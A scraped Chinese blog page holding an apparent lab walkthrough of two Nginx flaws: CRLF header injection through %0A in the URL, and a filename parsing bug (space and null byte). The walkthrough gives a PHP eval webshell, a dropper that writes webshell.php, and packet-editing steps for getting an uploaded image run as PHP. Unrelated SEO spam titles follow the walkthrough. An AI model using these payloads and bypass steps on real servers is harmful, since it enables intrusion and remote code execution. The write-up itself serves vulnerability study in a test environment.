当前位置: 首页 > news >正文

宁波网站推广宣传常宁网页设计

宁波网站推广宣传,常宁网页设计,网站建设公司 优势,正能量网站免费下载一、CRLF注入漏洞 原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞 1、开环境 2、访问网站,并抓包 3、构造请求头 %0ASet-cookie:JSPSESSID%3D1 这样就可以…

一、CRLF注入漏洞

原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞

1、开环境

2、访问网站,并抓包

3、构造请求头

%0ASet-cookie:JSPSESSID%3D1 

这样就可以看到响应头里有我们刚刚添加的cookie了

二、文件名逻辑漏洞

原理:非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6

1、开环境

2、制造木马

在我们本地新建一个1.jpg(因为这里只能上传图片文件)里面写入一句话木马

<?php @eval($_POST[cmd]);?>

3、上传木马,抓包

4、修改数据包

在文件名的最后加个空格,就可以把木马上传进去

5、放行,访问木马

这里看到木马已经上传进去了

(1)直接访问是访问不到的,我们需要在文件名后加...php然后抓包

(2)抓到包之后修改数据包,把2e 2e 2e修改为20 00 2e

(3)放行

修改完成之后放行就可以访问到木马了

6、测试连接

这里发现我们的木马文件虽然传上去了,但是因为我们的木马文件被编码了,所以直接连是连不上的,所以我们需要重新构造木马文件

7、重新构造文件上传

这串代码的意思是:在当前目录生成一个webshell.php文件,里面是一句话木马

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上传2.jpg,抓包,加空格,放行

访问刚刚上传的文件,这一步是为了执行代码

/uploadfiles/2.jpg...php

还是抓包,修改为20 00 2e

执行成功之后去访问我们木马里写的webshell.php文件

8、访问成功,测试连接

http://www.dtcms.com/a/608335.html

相关文章:

  • 用一部手机制作网站建销售网站需要多少钱
  • 网站图片移动怎么做石家庄热搜
  • 网站建设案例收费吗网站策划岗位要求
  • 公司网站开发策略和基本步骤深圳家具定制
  • 网站推广手段有哪些温州网约车哪个平台最好
  • vps网站空间google在线网页代理
  • 苏州网站开发公司招聘如何申请网站com域名
  • 巴中网站建设上海企业名录大全黄页
  • 网站建设免责申明书html响应式网页设计代码范文
  • 网站开发技术要学什么怎样提高网站访问速度
  • 怎样做网站分流赚钱建设一个公司网站需要什么知识
  • 网站专栏怎么做漂亮电商摄影
  • 昌平做网站的公司网站优化和推广方案ppt
  • 有哪些做平面设计好素材网站苏州网站建设营销
  • asp网站开发框架在上海做兼职在哪个网站好
  • 广西建设工程管理网站无锡网站推广哪家好
  • 广东网站设计工具赣州做网站的公司哪家好
  • 山西网站建设哪家好域名已更改请拿笔记住
  • .net 网站开发实例网站模板版权
  • 惠州专业网站建设青岛李沧网站建设
  • 阿里 设计网站建设代理免费注册公司
  • 网站制作公司大型宝塔面板加wordpress建站
  • 网站建设合同微信公众号功能开发
  • 做网站的资源有哪些篡改 网站 支付接口
  • 网站运营代理wordpress点击外链
  • 网站搭建设计合同群晖wordpress站点地址
  • 网站色彩搭配原则企业邮箱号码
  • 网站建设与管理教学视频教程网站站点怎么做
  • 上海网站建设联系电话网站建设费用计算依据
  • 做调查问卷的网站知乎专业视频剪辑培训机构